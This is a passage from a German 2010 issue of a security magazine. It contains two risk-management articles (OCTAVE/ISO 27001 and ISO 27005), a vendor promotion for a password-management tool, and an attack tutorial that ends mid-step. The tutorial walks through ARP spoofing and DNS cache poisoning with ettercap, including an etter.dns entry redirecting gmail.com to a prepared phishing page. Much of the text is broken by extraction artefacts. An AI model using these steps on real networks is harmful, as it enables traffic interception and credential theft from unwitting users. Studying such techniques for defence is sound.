für die Erhebung des gesamtorganisatorischen 

Schutzbedürfnisses. (vergl. Abb. 3) 

�� Aufbau von Asset-basierenden Bedro- 

��– Das Analyse Team stellt informati- 

10/2010

onsbezogene Assets und deren Impact auf die Organisation 

sowie deren derzeitige Schutzmechanismen 

fest. Darauf aufbauend werden die kritischsten 

�� 

dafür bestimmt. Anschließend wird für jedes kri- 

�� 

�� 

�� Erkennen von Verwundbarkeiten der Infrastruktur 

– Hier wird die, hinter den kritischen Assets 

liegende, Infrastruktur bewertet. Dabei werden kritische 

Infrastrukturpfade und informationstechnologische 

Komponentenklassen aufgestellt und einer 

technischen Überprüfung – dem Penetration Test – 

�� 

tung direkt ein. 

�� 

�� – In dieser Phase entscheidet 

das Analyse-Team wie mit den kritischen 

Assets umgegangen werden soll. Basierend auf die 

�� 

organisationsweite Schutzstrategie und ein Plan für 

die Reduzierung der erkannten Risiken, die auf die 

kritischen Assets und deren Infrastrukturen einwirken 

können erstellt. 

Die einzelnen Prozesse, die den drei Phasen hinterlegt 

sind, stellen sicher, dass von allen Organisati- 

Abbildung 4. Octave und Risikomanagement 

OCTAVE 

onseinheiten und von allen hierarchischen Ebenen 

– also von den MitarbeiterInnen über operationales 

und strategisches Management bis hin zum Management 

der ersten Ebene, alle Sichtweisen und 

die damit verbundenen Bewertungen der kritisch- 

�� 

können. 

OCTAVE generiert so eine organisationsweite Sicht 

auf die aktuellen Informationssicherheitsrisiken. 

�� 

zen: 

�� 

wie die erstellte Schutzstrategie und der Plan zur 

Risikoreduzierung umgesetzt werden kann. 

�� 

Handlungs-Planes. 

Überwachen/Beobachten des Handlungsplanes nach 

Effektivität. Das beinhaltet z.B. das Beobachten der 

Risiken für jede Änderung. 

�� 

ken. 

Die OCTAVE Methode ersetzt kein Risikomanagement 

sondern gehört in ein strukturiertes Risikomanage- 

hakin9.org/de 27

28 

Abbildung 5. Mapping auf ISO 27001 

ment eingebettet, welches nach einem �� 

act Zyklus arbeitet. (vergl. Abb 4) 

Die Organisation sollte in periodischen Abständen 

ihre ermittelte Baseline zurücksetzen indem eine 

nochmalige Risikoanalyse durchgeführt wird. Diese 

Zeitspanne kann vorgegeben werden oder von wichtigen 

Ereignissen wie z.B. eine Restrukturierungsmaßnahme 

der z.B. Netzwerkinfrastruktur u.v.m. angestoßen 

werden. Zwischen den Analysen kann die 

Organisation periodisch neue Risiken identifizieren, 

analysieren und in Relation zu bereits existierenden 

Risiken, Risiko reduzierende Maßnahmen entwickeln. 

Da die Risikoanalyse nur einen Teil des Risikomanagements 

darstellt ist die OCTAVE Methode mit ihrer 

offenen Schnittstelle hervorragend geeignet um als 

„Best Practice“-Grundlage die ISO 27001 Norm zu im- 

Mehr Informationen: 

�� www.cert.org/octave/ 

�� www.isaca.org 

�� www.standards-online.net/InformationSecurity- 

Standard.htm 

ABWEHR 

plementieren und in der Umsetzungsphase den COBIT 

4.0 Standard zu verwenden. 

OCTAVE bildet die Grundlage der in der ISO 27001 

�� 

trachtungsbereiches, feststellen von kritischen Organisationswerten, 

qualitative und eventuell quantitative 

Betrachtung von Risiken, Entwicklung von entsprechenden 

Kontrollmaßnahmen um Risiken zu minimieren 

oder aber auch zu akzeptieren. Anschließend kann 

man unter Zuhilfenahme von COBIT die, der ISO Norm 

zugeschriebenen, Kontrollen implementieren. Man 

kann somit die IT Sicherheitsstrategie der betrachteten 

Organisation mit einer Risikoanalyse nach dem OCTA- 

VE Ansatz, und dem standardisierten Reifegrad-Modell 

nach COBIT - geprüft nach ISO 27001 - auswerten und 

umsetzen. (Verg. Abb. 5) 

MAG. HELMUT KAUFMANN, MSC 

Dozent an der Fachhochschule St. Pölten und u.a. tätig im Bereich 

Secure Data Center Management, Cloud Computing, Disaster 

Recovery and Business Continuity, Fraud Detection. 

10/2010

News 

Wetten, dass ... Ihr größtes 

Betriebsgeheimnis ungeschützt ist? 

Wie ein schlechter Sickerwitz, stellt man sich zuerst die Frage, 

was ist unser größtes Betriebsgeheimnis: Die Kundenlisten, 

die Projektdokumentationen und Strategiepapiere, die Zahlen 

auf den Bankkonten oder gar die private Telefonnummer vom 

Vorstandsvorsitzenden? Schlussendlich sind es die Passwörter 

und Zugangsberechtigungen auf sämtliche Anwendungen und 

Datenbanken in jedem Unternehmen oder Organisation. 

Tausende Passwörter von Usern und 

Administratoren sind im Umlauf 

Man stelle sich komplexe IT Landschaften vor, die geografisch 

verteilt sind und viele Mitarbeiter, die in verschiedene 

„Rollen“ schlüpfen. Eine Buchhalterin hat nicht nur 

Zugang zu standardisierten Anwendungen, sondern auch 

zum Internetbanking, der FIBU Software und anderen 

kaufmännischen Programmen wie SAP. Interessant und 

zunehmend komplex wird es bei den IT Administratoren. 

Natürlich können sich diese, von vielen für ihre mathematischen 

Fähigkeiten bewunderten, auch nicht dutzende 

von Passwörtern merken, sondern helfen etwas nach: Pro 

Anwendung wird ein Passwort vergeben, das sich diese 

dann für längere Zeit im Gedächtnis behalten. Mit dieser 

Feststellung wird die gesamte Problematik sofort offenbar, 

ohne in technische Details gehen zu müssen: ein Passwort 

... für längere Zeit ... im Gedächtnis. 

Guter Rat ist teuer - und umsonst 

Richtlinien zur Passwortgestaltung gibt es unzählige und 

viele sind gut gemeint: Die Länge wird vorgegeben und 

auch die zu verwendenden Zeichen, die alle 4 Wochen 

zu ändern sind und natürlich nicht auf einem Post-It unter 

der Tastatur kleben sollen. Selbst wenn dies eingehalten 

wird, vergisst man sein neues Passwort spätestens, 

wenn man 2 Wochen auf Urlaub war und auch der Help- 

Desk freut sich, dass man wieder zurück ist. Auch der 

Auditor ist zumindest milde gestimmt, wenn die zentralen 

Passwörter zumindest in einer gesicherten Excel Liste 

zusammengefasst sind. Von IT Security sollte man aber 

dabei besser nicht sprechen, da jeder Administrator auf 

alle Passwörter zugreifen kann. Spätestens bei automatisierten 

(unattended) Passwörtern, die via Skript fixiert 

sind und auf eine Anwendung oder Datenbank zugreifen, 

sind verhaltensorientierte Ansätze obsolete. 

Passwortstruktur ist unbekannt 

Kaum ein IT Verantwortlicher hat verlässliche Informationen 

über die Strukturen und Verbreitungsgrade von 

Passwörtern in einer Organisation. Bei Implementie- 

rung eines automatisierten Passwort-Managements 

wird oft erst festgestellt, dass zehntausende privilegierte 

Administratorkonten vorhanden sind, aber nur 20% 

davon als Administratorkonten dienen. Der überwiegende 

Teil der Passwörter sind Application-to-Application 

(A2A) und Application-to-Database (A2D) Konten, die 

in Skripts den Zugriff ermöglichen. Und natürlich nur in 

seltensten Fällen geändert werden und somit immer eine 

Hintertüre, auch für den Ex-Mitarbeiter, offenlassen. 

Die Passwort Autorität: Freiwilligkeit und 

Empfehlungen sind nicht angebracht 

Die Zugangsberechtigungen sind als Schlüssel für Safes 

mit allen Geheimnissen der Organisation anzusehen.. Das 

Ergebnis einer Reflektion der Problematik „Passwörter“ 

kann nur sein, dass ein automatisiertes und auditierbares 

Software-Werkzeug in Frage kommen kann. Die Durchsetzung 

der Passwörter Policies, Zuteilung von Einmal-Passwörtern 

und vor allem eine sichere Authentifizierung und 

Ablage dieser ist natürlich ebenso ein Must-Have. In Zeiten 

wie diesen, sollte es auf Knopfdruck möglich sein, einen Administrator 

zu sperren oder zeitlich begrenzte Passwörter 

für externe Dienstleister ausstellen zu können. 

Antares NetlogiX empfiehlt nach eingehender Analyse 

- des sehr überschaubaren Marktes - die Lösung 

„Cloakware Password Authority“. Die ersten erfolgreichen 

Referenzprojekte und Kundenmeinungen haben 

diese Meinung weiter verstärkt. 

hakin9.org/de 29

30 

ABWEHR 

IT-Risikomanagement 

– Wozu brauche ich das? 

Andreas Lentwojt 

In der letzten Ausgabe habe ich Ihnen ausführlich die Norm 

ISO/IEC 27001 vorgestellt und einen kurzen Einblick in die 

27000-Familie gegeben. Ein Teil dieser Familie ist die ISO 27005, die 

sich mit dem IT-Risikomanagement befasst. 


�� 

�� 

�� 

In der heutigen Ausgabe werde ich Ihnen darstellen, 

warum es nützlich ist, sich mit dem Risikomanagement 

der IT zu beschäftigen und dabei auf das Modell 

der ISO 27005 zurück zu greifen. 

Auf dieses Thema wurde bereits in einer früheren 

Ausgabe eingegangen, in diesem Artikel wird aber 

mehr auf die Norm und den eigentlichen Prozess mit 

den einzelnen Schritten eingegangen. 

Abbildung 1. Aufbau eines Risikomanagementsystems (allgemein) 


�� 

men 

�� 

IEC 27001) 

Größere Unternehmen sind schon von Gesetz her 

verpflichtet, sich mit dem Themenbereich Risikomanagement 

zu beschäftigen (Aktiengesetz, Kon- 

TraG, GmbH-Gesetz u.Ä.). Ein Teil dieses Risikomanagements 

ist das IT-Risikomanagement, welches 

sich – wie der Name es schon sagt – mit den Risiken 

im IT-Bereich beschäftigt. Eine Problematik beim 

Risikomanagement, allgemein und speziell bei der 

10/2010

Informationstechnologie, ist die Bewertung der erkannten 

Risiken. Bereits seit einigen Jahren gab es 

nationale Normen, die sich mit einem standardisierten 

Vorgehensmodell beschäftigten. Im Juni 2008 

wurde daraus die international anerkannte Norm 

ISO/IEC 27005:2008 (ehem. BS 7799-3:2006). ISO 

27005:2008 ist eine spezielle Ausprägung der ISO/IEC 

31000:2009, die sich mit dem Risikomanagement allgemein 

befasst. Die genauen Bezeichnungen lauten: 

�� 

les and guidelines“ 

�� 

nagement“ 

Warum überhaupt ein IT-Risikomanagementsystem im 

Unternehmens-Kontext? 

Datenverlust und -diebstahl gehören zu den größten 

Problemen in Unternehmen. Bisher bezog sich Risikomanagement 

in Unternehmen hauptsächlich auf Markt- 

und Adressrisiken sowie auf finanzielle Risikofaktoren. 

Das Risikomanagement im IT-Bereich wurde weitgehend 

vernachlässigt. Dabei lassen sich Sicherheitslücken mittels 

Risikomanagement aufdecken und minimieren, was 

auch Regressforderungen an die Unternehmensführung 

Abbildung 2. Aufbau der ISO 27005:2008 

IT-Risikomanagement – Wozu brauche ich das? 

entgegenwirkt. Richtlinien wie Basel II oder Euro-SOX 

fordern diese Ausrichtung seit langem. 

Die ISO 27005 ist branchen- und größenunabhängig. 

Somit können auch kleinere und mittlere Unternehmen 

durch die Adaption der Inhalte auf die betrieblichen Anforderungen 

ein schlankes und effektives IT-Risikomanagement 

aufbauen. Gerade sensible Branchen wie 

Automotive, Healthcare, Software oder Telekommunikation 

werden hier angesprochen. Aufgrund ähnlicher 

Strukturen lässt sich die ISO 27005 ohne größeren Aufwand 

in ein unternehmensweites Risikomanagement 

integrieren, kann aber auch »solo« umgesetzt werden. 

Im Gegensatz zur ISO/IEC 27001 ist die ISO/IEC 27005 

selbst nicht zertifizierbar. 

Kapitel 1 

– Risikomanagementsystem allgemein 

Wie bei der ISO 27001 geht es auch bei der ISO 27005 

nicht um das „was“, sondern um das „wie“. Es ist ein 

Leitfaden zur Implementierung eines Risikoprozesses 

im Kontext der Informations- und Telekommunikationstechnologie. 

Wie sieht so ein Risikoprozess nun aus? 

Ganz allgemein betrachtet geht es wiederum um ein 

Managementsystem, welches aus 6 Schritten (vergl. 

Abb. 1) besteht: 

hakin9.org/de 31

32 

�� 

�� 

�� 

�� 

�� 

�� 

Kapitel 2 – Der Standard ISO/IEC 27005:2008 

Die ISO 27005 stellt eine Anleitung zur IT Risikoanalyse 

und zum Risikomanagement im IT Bereich dar. Sie 

beinhaltet dabei einerseits eine Beschreibung des kompletten 

Risikomanagementprozesses als Ganzes und 

andererseits eine genaue Beschreibung der einzelnen 

Schritte des Risikomanagementprozesses und der Risikoanalyse. 

Die Anhänge der IEC 27005 liefern zudem 

nützliche Informationen zur Implementierung eines Risikomanagementsystems 

im Bereich Informationssi- 

�� 

Norm ISO 27001: 

�� 

�� 

�� 

gen auf bedrohte Werte, direkte und indirekte Bedrohungen 

und Schwachstellen 

Abbildung 3. Der Sicherheitsprozess gem. ISO 27005:2008 

ABWEHR 

�� 

schätzung der Risikowahrscheinlichkeit und des Risikoniveaus 

�� 

�� 

managementmaßnahmen 

�� 

Aus diesen einzelnen Kapiteln der Norm wird der IT- 

Sicherheitsprozess entwickelt (vergl. Abb. 3). 

Kapitel 3 – Die Phasen 

Defi nition der Rahmenbedingungen 

In einem ersten Schritt wird in einer Schutzbedarfsfeststellung 

(High Level Risk Analysis) der Schutzbedarf für 

�� 

Schutzbedarfskategorie "niedrig bis hoch" wird i.d.R. auf 

eine detaillierte Risikoanalyse verzichtet. Dies erlaubt eine 

schnelle und effektive Auswahl von grundlegenden 

Sicherheitsmaßnahmen bei gleichzeitiger Gewährleistung 

eines angemessenen Schutzniveaus. IT-Systeme 

der Schutzbedarfskategorie „sehr hoch" sind einer detaillierten 

Risikoanalyse zu unterziehen, auf deren Basis 

individuelle Sicherheitsmaßnahmen ausgewählt werden. 

10/2010

Diese Option kombiniert die Vorteile des Grundschutz- 

und des Risikoanalyseansatzes, da alle IT- 

Systeme mit hohem Schutzbedarf wirksam und angemessen 

geschützt werden. Maßnahmen können für die 

anderen Systeme mit Hilfe des Grundschutzes schnell 

und effektiv ausgewählt werden. Diese Methode stellt in 

den meisten Einsatzumgebungen eine empfehlenswerte 

Strategie zur Risikoanalyse dar. 

Zu den einzelnen Kriterien, die festgelegt werden 

müssen gehören u.a. 

�� 

�� 

�� 

�� 

Risikobewertung 

Die Risikobewertung gliedert sich in die beiden Vorgänge 

Risikoanalyse und der Priorisierung der Risiken. 

Die Risikoanalyse ist sicherlich der schwierigste und 

aufwendigste Teil, müssen doch zunächst die Risiken 

��sets“ 

des Unternehmens wird folgender Prozess durchlaufen: 

�� 

�� 

�� 

�� 

�� 

Dieser Prozess wird für alle Assets wiederholt. Ein Asset 

im Sinne der ISO 27005 ist alles, was einen Wert 

für die Organisation besitzt und daher schützenswert 

�� 

Rahmenbedingungen den zu betrachtenden Rahmen 

zunächst eng zu fassen. Er kann später immer noch 

erweitert werden. Die Norm unterteilt hierbei in primäre 

Assets (Geschäftsprozesse und –aktivitäten, Informationen) 

und unterstützende Assets (Hard- und Software, 

Netzwerk, Personal, Infrastruktur, etc.). Eine de- 

�� 

Norm. 

Aus dem beschriebenen Prozess erfolgt eine Analyse 

und Auflistung der Konsequenzen und letztendlich eine 

Risikoeinschätzung. 

��- 

��wertung 

nach Zeitwert, nach Wiederbeschaffungswert, 

nach dem Wert für einen potenziellen Angreifer oder 

nach dem Schaden für die Organisation aus einem Verlust 

des Assets. Immaterielle Werte werden i.d.R. nach 

dem Wert für einen potenziellen Angreifer oder nach dem 

Schaden für die Organisation aus einem Verlust des Assets 

bewertet. Bei der Bewertung ist zu beachten, dass 

Wertekombinationen häufig nicht der Summe der Einzel- 


werte entsprechen, da sich die Werte in Kombination ergänzen 

und einen höheren Wert darstellen. 

Die zu schützenden Werte sind vielfältigen Bedrohungen 

ausgesetzt. Im Rahmen der Risikoanalyse 

ist nun die Eintrittswahrscheinlichkeit abzuschätzen. 

Bedrohungen sind charakterisiert durch: 

�� 

�� vorteile, 

Rache) 

�� 

�� hung 

verursacht werden kann. 

��ben, 

Blitzschlag, ...) liegen statistische Daten vor, die 

für die Einschätzung hilfreich sein können. 

Die Bedrohungsanalyse umfasst im Einzelnen: 

�� 

�� 

Bedrohungen können unterteilt werden in: 

�� sonalausfall) 

�� chende 

Dokumentation) 

�� nutzung 

oder -administration, Nichtbeachtung von 

Sicherheitsmaßnahmen) 

�� tenträger) 

�� 

von Geräten, Manipulation an Daten oder Software, 

Viren, trojanische Pferde) 

Es ist wichtig, alle wesentlichen Bedrohungen zu erfassen, 

da andernfalls Sicherheitslücken bestehen 

bleiben können. Im Anhang C der Norm ist eine umfangreiche 

Listung von Bedrohungen vorhanden, jedoch 

kann keine derartige Liste vollständig sein. Darüber 

hinaus sind auch Bedrohungen einem ständigen 

Wandel und einer ständigen Weiterentwicklung unterworfen. 

Nachdem Werte und Bedrohungen erfasst wurden, 

muss nun die Eintrittswahrscheinlichkeit zugeordnet 

werden. Es ist also zu bestimmen, mit welcher Wahrscheinlichkeit 

eine Bedrohung im betrachteten Umfeld 

eintreten wird. 

Auch die Eintrittswahrscheinlichkeit kann quantitativ 

oder qualitativ bewertet werden. Da eine quantita- 

�� täuschen 

könnte, ist in den letzten Jahren ein Trend in 

Richtung qualitativer Bewertung zu erkennen. 

hakin9.org/de 33

34 

Bewährt haben sich hier etwa drei- bis fünfteilige Skalen 

(z.B. 4: sehr häufig … 0: sehr selten) 

Diese allgemeinen Bedeutungen der Skalenwerte 

können für jeden einzelnen spezifischen Anwendungsbereich 

konkretisiert werden. 

Nachdem Werte, Bedrohungen und Eintrittswahrscheinlichkeiten 

definiert sind, wird eine Schwachstellenanalyse 

durchgeführt. Unter einer Schwachstelle (Vulnerability) 

versteht man eine Sicherheitsschwäche eines 

oder mehrerer Objekte, die durch eine Bedrohung ausgenützt 

werden kann. Eine Schwachstelle selbst verursacht 

noch keinen Schaden, sie ist aber die Voraussetzung, 

die es einer Bedrohung ermöglicht, wirksam zu werden. 

Typische Beispiele für Schwachstellen sind etwa: 

Mangelnder baulicher Schutz von Räumen mit IT-Einrichtungen 

�� 

�� 

�� 

heitsbewusstsein 

�� 

�� 

Sicherheitsschwächen und muss sowohl das Umfeld 

als auch bereits vorhandene Schutzmaßnahmen mit 

einbeziehen. Es ist wichtig, jede Schwachstelle daraufhin 

zu bewerten, wie leicht es ist, sie auszunutzen. 

�� 

�� 

Vor der eigentlichen Risikobewertung werden noch 

die bestehenden Sicherheitsmaßnahmen betrachtet 

und bewertet. Stellt sich heraus, dass eine bereits existierende 

oder geplante Maßnahme ihren Anforderungen 

nicht gerecht wird, so ist zu prüfen, ob sie ersatzlos 

entfernt, durch andere Maßnahmen ersetzt oder aus 

Kostengründen belassen werden soll. 

Abbildung 4. Beispielhafte Risikomatrix (Bildquelle: HMP) 

ABWEHR 

Im Rahmen dieses Schrittes sollte auch geprüft werden, 

ob die bereits existierenden Sicherheitsmaßnah- 

�� 

ständig eingesetzte Sicherheitsmaßnahmen stellen eine 

zusätzliche potentielle Schwachstelle eines Systems dar. 

Die eigentliche Risikobewertung ist nun das Zusammenführen 

der in den vorherigen Abschnitten beschriebenen 

Maßnahmen und die Erstellung einer Risikomatrix (vergl. 

Abb. 4). Darin werden die bewerteten Risiken gemäß ihres 

Risikopotenzials in einer Matrix angeordnet und dem gewünschten 

SOLL gegenüber gestellt. Im Anhang der Norm 

befinden sich einige Beispiele für eine Risikobewertung. 

Anhand der Risikomatrix erfolgt die Priorisierung der 

Risiken, in Abhängigkeit des zur Verfügung stehenden 

Budgets und der Ressourcen. 

Risikobehandlung 

Die Phase der Risikobehandlung ist das „tägliche Tun“ 

�� 

bezogen auf die Informationstechnologie das Gegenüberstellen 

der Anforderungen aus der Risikobewertung 

mit dem Ergebnis der durchgeführten Maßnahmen 

und eine neue Bewertung dieser: vergl. Abb. 

5. 

Die Optionen zur Risikobehandlung werden in 4 Kategorien 

eingeteilt: 

�� 

bestimmter Maßnahmen, etc.) 

�� 

�� 

tiger Verfahren) 

�� 

Risikoüberwachung und –akzeptanz 

Basierend hierauf erfolgt eine neue Bewertung des 

Restrisikos und der Risikomanagementprozess geht 

10/2010

Abbildung 5. Ablauf Risikobehandlung (Bildquelle: CIS) 

über in die Risikoüberwachung. Diesen Ablauf – auch 

PDCA-Prozess genannt (Plan-Do-Check-Act) – kennen 

Sie bereits aus dem vorherigen Artikel über die ISO 

27001. Eine neue Bewertung ist ebenfalls durchzuführen, 

wenn sich Vorgaben ändern, neue Assets implementiert 

werden oder die Bedrohungssituation sich ändert. 

Bei der Risikoakzeptanz ist es wichtig, die Entscheidungskriterien 

detailliert zu dokumentieren, damit sich 

auch später noch nachvollziehbar sind. 

Risikoreporting 

Sinn des Risikoreportings ist zum einen die Information 

des Managements über den aktuellen Stand der Risikosituation 

und der eingeleiteten Maßnahmen, zum 

anderen dient diese natürlich auch der Dokumentation. 

Weitere Inhalte können z.B. sein, das Sicherheitsbewusstsein 

zu verbessern oder das Einfordern von Entscheidungen. 

Die Ergebnisse von Risikobewertungen sind i.d.R. 

vertraulich und dementsprechend zu handhaben. 

Kapitel 4 – Nutzen und Fazit 

Die Einführung eines Risikomanagementsystems 

nach ISO/IEC 27005:2008 unterscheidet sich vom 

Prozess her nur in Teilbereichen von der Einführung 

eines kompletten Risikomanagementsystems nach 

ISO/IEC 31000. Jedoch ist der Aufwand wesentlich 

geringer, da es sich nur um einen Teilbereich des Unternehmens 

handelt. Auch hier gilt wieder der Grundsatz, 

dass Unternehmen, die bereits ein Qualitätsmanagement-System 

im Einsatz haben (z.B. ISO 9001), 

weniger Zeit benötigen, da ihnen die Prozess-orien- 


tierte Denkweise und das strukturierte Vorgehen bereits 

vertraut sind. 

Ohne Informations- und Kommunikationstechnik 

kann heute kaum noch ein Unternehmen auskommen, 

auch nicht zeitweise. Das gilt auch für kleinere und mittlere 

Unternehmen genauso wie für Großunternehmen 

und Konzerne. Deshalb sollte das Management wissen, 

welche Risiken gerade im IT-Bereich bestehen und wie 

diesen begegnet werden kann. Gerade im Bereich der 

Informations- und Telekommunikationssysteme sind 

die immateriellen Werte, also diejenigen Werte, denen 

nicht eine Einkaufsrechnung gegenübergelegt werden 

kann, häufig kaum bekannt. 

Die Norm ISO/IEC 27005:2008 bietet den Vorteil, 

dass mit einem kleinen Teilbereich (z.B. Netzwerk) begonnen 

werden kann und sukzessive weitere Assets 

einbezogen werden können. Zudem bietet die Norm im 

Anhang Beispiele und Checklisten für das Vorgehen. 

ANDREAS LENTWOJT 

Der Autor ist Managementberater, CEO und Inhaber „AL- 

Consult“. Nach dem Studium der Betriebswirtschaft mit den 

Schwerpunkten Organisation und IT arbeitete er langjährig 

bei Banken und Finanzdienstleistern als Organisations-/IT- 

Leiter und später als Security-Offi cer. 2004 gründete er das 

Beratungsunternehmen ALConsult mit den Schwerpunkten 

Security und Prozessmanagement. Er ist zertifi zierter ISO 

27001-Auditor und besitzt weitere Zertifi kate wie CObIT und 

ITIL. Der Schwerpunkt der Beratung liegt im organisatorischen 

Bereich und den Prozessen, nicht auf der Technik. 

hakin9.org/de 35

�� 

�� 

�� 

�� 

�� 

�� 

�� 

�� 

�� 

�� 

�� 

�� 

�� 

�� 

�� 

�� 

�� 

�� 

�� 

�� 

�� 

�� 

�� 

�� 

�� 

��

DNS Cache Poisoning 


Patrick Schmid 

Als Ergänzung zu meinem ersten Artikel Java Applet Attacke 

erfahren wir hier, wie wir ein Opfer mittels DNS Spoofing 

unbemerkt eine präparierte Seite unterschieben können. 


�� 

�� 

Vor einiger Zeit habe darüber geschrieben, 

wie man mit SET auf einfache Art und Weise 

eine Java Applet Attacke durchführen 

kann. Dieser Artikel lies aber offen, wie man das 

Opfer auf die präparierte URL umleitet, was mitunter 

wahrscheinlich der schwierigste Teil des ganzen 

Angriffes ist. Damit eine solche Attacke aber auch 

erfolgreich eingesetzt werden kann, dient dieser Artikel 

als Ergänzung, um diese Informationslücke zu 

füllen. 

Abbildung 1. Eine Anfrage (rot) an Ziel 


�� 

�� 

gement. 

Um ein Opfer auf eine präparierte Seite umzuleiten, 

ist DNS Cache Poisoning (auch DNS Spoofing genannt) 

eine effektive und schnelle Möglichkeit. Darunter 

versteht man ein Angriff, wobei Einträge in einem DNS 

zu eigenen Gunsten manipuliert werden. 

Das Opfer merkt dabei im Idealfall nichts davon: Dieses 

tippt wie üblich zum Beispiel www.google.ch ein, 

nur anstatt bei der DNS-Abfrage die IP-Adresse der 

Google-Server zurückkommt, erhält das Opfer die IP- 

Adresse einer präparierten Seite. 

hakin9.org/de 37

38 

Für diese Attacke werden wir das Tool ettercap verwenden, 

da es relativ einfach aufgebaut ist, dabei aber 

trotzdem viele Einstellungsmöglichkeiten bietet. 

Unsere Attacke wird in zwei Stufen aufgebaut sein. 

Als erstes müssen wir das Opfer oder besser dessen 

Computer dazu bringen, seinen ganzen Traffic auf unseren 

Computer umzuleiten, also eine sogenannte 

Man-in-the-middle-Attacke ausführen. 

Dazu werden wir ARP Spoofing verwenden. ARP ist 

ein Protokoll auf Layer 2 (Sicherung), um anhand einer 

IP-Adresse die zugehörige MAC-Adresse abzufragen. 

Die Funktionsweise von ARP Spoofing ist einfach. Der 

Grund für dessen Erfolg ist der dynamische ARP-Cache 

auf jedem Client und eine Zuordnungstabelle auf jedem 

Switch: Ein Switch führt eine Zuordnungstabelle, worin die 

MAC-Adressen der angeschlossenen Geräte dem jeweiligem 

Port zugeordnet sind. Diese gibt es deshalb, weil ein 

Switch somit genau weiss, welches System an welchem 

Port angeschlossen ist und somit auch, an welchen Port 

ein einzelnes Datenpaket weitergeleitet werden muss. 

Der Client führt einen eigenen ARP-Cache, worin er 

eine MAC-Adresse einer IP-Adresse zuordnet, sodass 

er nicht vor jedem Versenden eines Paketes die MAC- 

Adresse zu einer IP neu abfragen muss. 

Veranschaulicht könnte das dann so ablaufen (Bild 1): 

�� 

nen ARP-Cache nach der MAC-Adresse des Zieles 

ab und packt diese danach mit in das Paket. 

�� 

aus und weiss anhand seiner Zuordnungstabelle 

das zu dieser MAC-Adresse der Port 1 gehört, worauf 

er das Paket an Port 1 und somit an das Ziel 

weiterleitet. 

�� 

seines Opfers so verändern, dass eine IP-Adresse einer 

total neuen, beliebigen MAC-Adresse zugeordnet wird. 

Abbildung 2. Eine Anfrage (rot) an Ziel während ARP-Spoofi ng 

ANGRIFF 

Wieder ein Beispiel dazu (Bild 2): 

�� 

�� 

les nicht mehr die MAC-Adresse des Zieles, sondern 

die des Angreifers zugeordnet ist. 

�� 

Paketes seinen ARP-Cache nach der MAC-Adresse 

des Zieles ab. Aber anstatt von seinem ARP- 

Cache auch die MAC-Adresse des Zieles zu erhalten, 

bekommt er die des Angreifers, welche er in totaler 

Unwissenheit in sein Paket packt. 

�� 

Pakete aus und vergleicht diese mit seiner Zuordnungstabelle. 

Anhand der MAC-Adresse (die des 

Angreifers) sendet er das Paket an Port 2 und somit 

an den Angreifer und nicht wie vom Opfer geplant 

an das Ziel. 

Somit geht der Verkehr aber erst vom Opfer zum Angreifer. 

Damit das Oper davon aber nichts merkt, muss der 

Angreifer die abgefangene Anfrage an das Ziel weiterleiten.Nun 

verläuft die Kommunikation schon vom Opfer 

über den Angreifer zum Ziel. 

Damit man aber auch den gesamten Verkehr in die andere 

Richtungen, also Anfragen und Antworten mitkriegt, 

macht man ARP-Attacken immer auf den Client und den 

Router / Gateway gleichzeitig, womit nun eine Kommunikation 

vom Opfer über den Angreifer zum Ziel und auch 

wieder zurück möglich ist. Damit ist die Man-in-the-Middle- 

Attacke komplett und der Angreifer ist in der Lage, den 

gesamten Netzwerkverkehr seines Opfers nicht nur abzufangen 

und mit zuhören, sondern auch beliebig zu verändern, 

was uns auch sogleich zu Schritt 2 bringt. 

Im ersten Artikel haben wir als Beispiel die Seite Gmail 

kopiert und präpariert. Also wollen wir auch gleich dort 

anknüpfen. 

10/2010

Nun gilt es für den Angreifer darauf zu warten, bis das 

Opfer den A-Record von gmail.com abfragt. Sehen wir 

nun in unserem mitgehörten Traffic eine solche Anfrage, 

so muss das Antwortpaket soweit verändert werden, 

dass anstatt die tatsächliche IP-Adresse nun die IP-Adresse 

zu unserer präparierten Seite übermittelt wird. 

Das Opfer selbst empfängt und akzeptiert das so, 

weil es selbst von der Veränderung nichts mitbekommt. 

Alle Anfragen, welche das Opfer von nun an an Gmail 

macht, werden nicht an Gmail selbst, sondern an unsere 

präparierte Seite gesandt, womit unser Vorhaben 

erfüllt wäre. 

So nun genug Theorie, schreiten wir zur Tat! 

Beide Schritte können direkt mit ettercap durchgeführt 

werden. 

Dabei handelt es sich um ein Stück Software mit Spezialisierung 

auf Man-in-the-Middle-Attacken, welches 

unter der GPL wahlweise für Windows, Linux oder Mac 

veröffentlicht wurde. 

Leider wurde es seit einiger Zeit nicht mehr weiterentwickelt, 

was sich jedoch nicht auf die Funktionalität 

auswirkt. 

Ettercap kann wahlweise via GUI oder Konsole bedient 

werden, doch erstmal wird alles konfiguriert. 

Zuerst müssen wir unsere eigenen A-Rekords für 

gmail.com anlegen. Dazu editieren wir die Datei /usr/ 

share/ettercap/etter.dns und erweitern diese um einen 

Eintrag wie in Listing 1 dargestellt. 

Wenn wir nun speichern, so haben wir festgelegt, 

dass Anfragen nach der IP von gmail.com oder *.gmail. 

com mit 127.0.0.1 beantwortet werden sollen. 

Listing 1. ein A-Record für eine präparierte Seite von 

gmail.com 

*.gmail.com A 127.0.0.1 

gmail.com A 127.0.0.1 

Abbildung 3. GTK-GUI von ettercap 


Somit sind wir auch schon bereit und können bereits 

mit Schritt 1 beginnen. 

Dazu starten wir ettercap und wählen unter dem 

Punkt Sniff den Unterpunkt Unified sniffing aus. Dabei 

werden wir nach dem Interface gefragt, über welches 

der Angreifer mit dem Netzwerk des Opfers verbunden 

ist. Im Falle einer Verbindung via Kabel ist das meist 

eth0, bei WLAN meist wlan0. 

Ist auch das vollbracht, so können das oder die Ziele 

identifiziert werden. Dazu wählen wir den Punkt Hosts > 

Scan for hosts, wodurch automatisch alle 255 Hosts im 

Subnet angepingt werden (Bild 3). 

Ist auch das durchgestanden, so können die Ziele unter 

Hosts > Hosts list ausgewählt werden. Als Target 1 

muss der Router oder Gateway und das Opfer als Target 

2 ausgewählt werden. Hier muss gegebenenfalls 

mit nmap nach geprüft werden um die IP des Opfers zu 

identifizieren. 

Nun kann mit dem Selektieren von Mitm > Arp poisoning 

die ARP-Attacke gestartet und Schritt 1 somit beendet 

werden. 

Wird nun Wireshark oder tcpdump gestartet, so kann 

man allen Netzwerkverkehr des Opfers und des Routers 

/ Gateways mitgehört werden. 

Nun gleich weiter zu Schritt 2. Nachdem die Man-inthe-Middle-Attacke 

steht, können wir dem Opfer nun 

unsere DNS-Records aufzwingen. 

Dazu verwenden wir die ettercap-Plugins unter dem 

Punkt Plugins > Manage the plugins. Da wählen wir den 

